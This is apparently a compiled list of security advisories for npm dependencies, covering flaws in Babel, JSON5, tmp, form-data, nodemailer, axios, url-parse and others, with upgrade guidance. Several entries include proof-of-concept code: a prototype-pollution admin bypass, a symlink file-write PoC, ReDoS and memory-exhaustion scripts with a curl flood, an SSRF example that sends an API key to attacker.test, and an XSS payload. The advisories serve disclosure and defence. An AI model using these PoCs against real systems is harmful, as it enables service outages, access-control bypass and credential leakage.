All the vulnerabilities related to version 1.0.2 of the package.
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate() or path.evaluateTruthy() internal Babel methods.
Known affected plugins are:
- @babel/plugin-transform-runtime
- @babel/preset-env when using its useBuiltIns option
- @babel/helper-define-polyfill-provider, and the plugins based on it, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims and babel-plugin-polyfill-regenerator

No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
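For illustration, a minimal sketch (not taken from the advisory) of the pattern the affected plugins rely on, assuming a hypothetical constant-folding plugin:

// Hypothetical plugin: constant-folds expressions via path.evaluate().
// In affected @babel/traverse versions, statically "evaluating" code that
// an attacker crafted for compilation can end up executing that code.
module.exports = function constantFoldPlugin({ types: t }) {
  return {
    visitor: {
      BinaryExpression(path) {
        const { confident, value } = path.evaluate(); // the vulnerable call
        if (confident) {
          path.replaceWith(t.valueToNode(value)); // fold to a literal
        }
      },
    },
  };
};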
The vulnerability has been fixed in @babel/traverse@7.23.2.
Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.
Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
- @babel/plugin-transform-runtime v7.23.2
- @babel/preset-env v7.23.2
- @babel/helper-define-polyfill-provider v0.4.3
- babel-plugin-polyfill-corejs2 v0.4.6
- babel-plugin-polyfill-corejs3 v0.8.5
- babel-plugin-polyfill-es-shims v0.10.0
- babel-plugin-polyfill-regenerator v0.5.3

Prototype Pollution in JSON5 via Parse Method
The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then perform the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
Cross-site Scripting in karma
karma prior to version 6.3.14 contains a cross-site scripting vulnerability.
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an arbitrary temporary file / directory write via the symbolic link dir parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic links when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file to a folder outside the tmpDir is possible.
Tested on a Linux machine.
1. Create a symlink inside the tmpDir that points to a directory outside of it:
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
2. Run main.js (listed below):
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
3. The temporary file is written to $HOME/mydir1 (outside the tmpDir):
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A potential fix could be to call fs.realpathSync (or similar), which also resolves symbolic links:
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Incorrect Default Permissions in log4js
Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.
Fixed by a change released to npm in log4js@6.4.0.
Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.
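For example, a sketch of a configuration that restricts a file appender's log file to its owner (the filename is illustrative):

const log4js = require('log4js');

log4js.configure({
  appenders: {
    // mode 0o600: owner read/write only, instead of the world-readable default
    app: { type: 'file', filename: 'app.log', mode: 0o600 },
  },
  categories: { default: { appenders: ['app'], level: 'info' } },
});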
Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
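A sketch of the attacker-side setup (hostnames are hypothetical): the attacker-controlled server answers every request with a cross-protocol redirect, which affected versions follow even when SSRF mitigations were keyed to the original protocol:

// Hypothetical attacker-controlled server: redirects HTTP to an HTTPS target.
const http = require('http');

http.createServer((req, res) => {
  res.writeHead(302, { Location: 'https://internal-service.example/admin' });
  res.end();
}).listen(8080);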
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
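A minimal reproduction, based on the publicly reported PoC (requires a vulnerable tough-cookie before 4.1.3):

const tough = require('tough-cookie');

// rejectPublicSuffixes: false is the vulnerable mode
const jar = new tough.CookieJar(undefined, { rejectPublicSuffixes: false });
jar.setCookieSync(
  'Slonser=polluted; Domain=__proto__; Path=/notauth',
  'https://__proto__/admin'
);
// On vulnerable versions, Object.prototype now carries a "/notauth" key:
console.log({}['/notauth']);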
Regular Expression Denial of Service in timespan
Affected versions of timespan are vulnerable to a regular expression denial of service when parsing dates.
The amplification for this vulnerability is significant, with 50,000 characters resulting in the event loop being blocked for around 10 seconds.
No direct patch is available for this vulnerability.
Currently, the best available solution is to use a functionally equivalent alternative package.
It is also sufficient to ensure that user input is not passed into timespan, or that the maximum length of such user input is drastically reduced. Limiting the input length to 150 characters should be sufficient in most cases.
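A sketch of that mitigation, assuming timespan's parseDate as the entry point for untrusted date strings:

const timespan = require('timespan');

// Cap attacker-controllable input before it reaches the vulnerable parser.
function parseDateSafely(input) {
  if (typeof input !== 'string' || input.length > 150) {
    throw new Error('date string rejected: too long or not a string');
  }
  return timespan.parseDate(input);
}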
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker can observe other values produced by Math.random() in the target application and can control part of a request sent via form-data.
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose).
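To illustrate the injection half of the attack (the PRNG-recovery step is omitted), a sketch with a hypothetical predicted boundary: a user-controlled field value that embeds the boundary closes its own part and appends an attacker-chosen parameter:

// Hypothetical: the attacker has recovered the PRNG state and predicted the
// boundary that form-data will use for the next request.
const predictedBoundary = '--------------------------520882066564850425362143';

// A field "value" that terminates the current part and injects a new one.
const maliciousValue =
  'harmless\r\n' +
  `--${predictedBoundary}\r\n` +
  'Content-Disposition: form-data; name="isAdmin"\r\n' +
  '\r\n' +
  'true';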
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
- Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array).
- Leak other Math.random() values to the attacker, so that the PRNG state can be recovered.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
Code Injection in pac-resolver
This affects the package pac-resolver before 5.0.0. This can occur when used with untrusted input, due to unsafe PAC file handling. NOTE: The fix for this vulnerability is applied in the node-degenerator library, a dependency written by the same maintainer.
Improper parsing of octal bytes in netmask
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
:exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version 2.0.1, which was assigned CVE-2021-29418 / GHSA-pch5-whg9-qr2r. For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.
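A sketch of the bypass against a vulnerable version ("0177.0.0.1" is octal notation for 127.0.0.1, but affected versions read it as decimal 177.0.0.1):

const { Netmask } = require('netmask'); // vulnerable: <= 1.0.6

const loopback = new Netmask('127.0.0.0/8');
// Should be true (0177.0.0.1 == 127.0.0.1), but vulnerable versions return
// false, so blocklist checks pass while the OS resolver still dials loopback.
console.log(loopback.contains('0177.0.0.1'));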
netmask npm package mishandles octal input data
The netmask package before 2.0.1 for Node.js mishandles certain unexpected characters in an IP address string, such as an octal digit of 9. This (in some situations) allows attackers to bypass access control that is based on IP addresses. NOTE: this issue exists because of an incomplete fix for CVE-2021-28918.
Command injection in nodemailer
This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.
nodemailer ReDoS when trying to send a specially crafted email
A ReDoS vulnerability occurs when nodemailer tries to parse img files with the attachDataUrls parameter set, causing the event loop to stall.
Another flaw was found when nodemailer tries to parse attachments with an embedded file, also stalling the event loop.
Regex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/
Path: compile -> getAttachments -> _processDataUrl
Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/
Path: _convertDataImages
https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698
async function exploit() {
  const MailComposer = require("nodemailer/lib/mail-composer");
  const MailComposerObject = new MailComposer();
  // Create a malicious data URL that will cause excessive backtracking:
  // a long run of ';'-separated segments keeps the regex engine busy
  const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';
  // Call the vulnerable method with the crafted input
  const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}

exploit();
The ReDoS blocks the event loop; a specially crafted malicious email can trigger this problem.
Header injection in nodemailer
The package nodemailer before 6.6.1 is vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
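A short sketch of the miscategorization on a vulnerable version:

const ip = require('ip'); // vulnerable: <= 2.0.1

// Both inputs are loopback-equivalent, yet are reported as globally routable:
console.log(ip.isPublic('127.1'));            // true on vulnerable versions
console.log(ip.isPublic('::fFFf:127.0.0.1')); // true on vulnerable versions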
Arbitrary Code Execution in underscore
The package underscore from 1.13.0-0 and before 1.13.0-2, and from 1.3.2 and before 1.12.1, is vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument, as it is not sanitized.
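A minimal sketch of the injection against a vulnerable version (the payload here just logs a string):

const _ = require('underscore'); // vulnerable range, e.g. 1.12.0

// The unsanitized `variable` setting is spliced into the generated template
// function source, so it can break out of it and run arbitrary code.
const payload = '){ console.log("code injected") }; with(obj||{}';
const compiled = _.template('', { variable: payload });
compiled(); // prints "code injected" on vulnerable versions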
Node-Redis potential exponential regex in monitor mode
When a client is in monitoring mode, the regex being used to detect monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service.
The problem was fixed in commit 2d11b6d and was released in version 3.1.1.
#1569 (GHSL-2021-026)
Cookie exposure in requestretry
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
Denial of Service in axios
Versions of axios prior to 0.18.1 are vulnerable to Denial of Service. If a request exceeds the maxContentLength property, the package prints an error but does not stop the request. This may cause high CPU usage and lead to Denial of Service.
Upgrade to 0.18.1 or later.
Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
- The decoding path enforces neither config.maxContentLength nor config.maxBodyLength, which only apply to HTTP streams.
- A data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.
const axios = require('axios');
async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});
console.log('Received bytes:', response.data.length);
}
main().catch(err => {
console.error('Error:', err.message);
});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength / maxBodyLength entirely and decodes the full payload into memory on Node before streaming, enabling DoS.
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
Run this app and send 3 POST requests:
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
Enforce size limits: for protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.
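A minimal sketch of such a check (not the actual axios patch), estimating the decoded size from the Base64 payload length:

// Reject oversized data: URIs before decoding them into memory.
function assertDataUriWithinLimit(uri, maxContentLength) {
  const comma = uri.indexOf(',');
  const payload = comma === -1 ? '' : uri.slice(comma + 1);
  // Base64 packs 3 bytes into 4 characters, so decoded size is ~3/4 of it.
  const approxDecodedBytes = Math.floor((payload.length * 3) / 4);
  if (maxContentLength > -1 && approxDecodedBytes > maxContentLength) {
    throw new Error(
      `data: URI payload (~${approxDecodedBytes} bytes) exceeds maxContentLength (${maxContentLength})`
    );
  }
}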
Stream decoding: instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
Axios vulnerable to Server-Side Request Forgery
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
axios Inefficient Regular Expression Complexity vulnerability
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
- When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
- Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
Any application that sets a baseURL and does not validate path parameters is affected by this issue.
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host, allowing attackers to view sensitive information.
url-parse Incorrectly parses URLs that include an '@'
When a specially crafted URL with an '@' sign but empty user info and no hostname is parsed with url-parse, it will return an incorrect href. In particular,
parse("http://@/127.0.0.1")
will return:
{
slashes: true,
protocol: 'http:',
hash: '',
query: '',
pathname: '/127.0.0.1',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'http:///127.0.0.1'
}
If the 'hostname' or 'origin' attributes of the output from url-parse are used in security decisions and the final 'href' attribute of the output is then used to make a request, the decision may be incorrect.
Path traversal in url-parse
url-parse before 1.5.0 mishandles certain uses of backslash such as http:\/ and interprets the URI as a relative path.
Authorization Bypass Through User-Controlled Key in url-parse
url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.
Open redirect in url-parse
Affected versions of npm url-parse are vulnerable to URL Redirection to Untrusted Site.
Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
url-parse incorrectly parses hostname / protocol due to unstripped leading control characters.
Leading control characters in a URL are not stripped when passed into url-parse. This can cause input URLs to be mistakenly interpreted as relative URLs without a hostname and protocol, while the WHATWG URL parser will trim control characters and treat the input as an absolute URL.
If url-parse is used in security decisions involving the hostname / protocol, and the input URL is used in a client which uses the WHATWG URL parser, the decision may be incorrect.
This can also lead to a cross-site scripting (XSS) vulnerability if url-parse is used to check for the javascript: protocol in URLs. See following example:
const parse = require('url-parse')
const express = require('express')
const app = express()
const port = 3000

// Leading \b (backspace) control character is not stripped by url-parse
const url = parse("\bjavascript:alert(1)")
console.log(url)

app.get('/', (req, res) => {
  if (url.protocol !== "javascript:") { res.send("<a href='" + url.href + "'>CLICK ME!</a>") }
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})
Authorization bypass in url-parse
Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to memory exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any point in the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
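A sketch of the trigger on a vulnerable version (the repeat count is illustrative; run with a capped heap to observe the crash quickly):

const braces = require('braces'); // vulnerable: < 3.0.3

// Imbalanced braces drive the parser's loop; heap usage grows unboundedly.
braces.parse('{'.repeat(500000));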
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking on the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix, but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
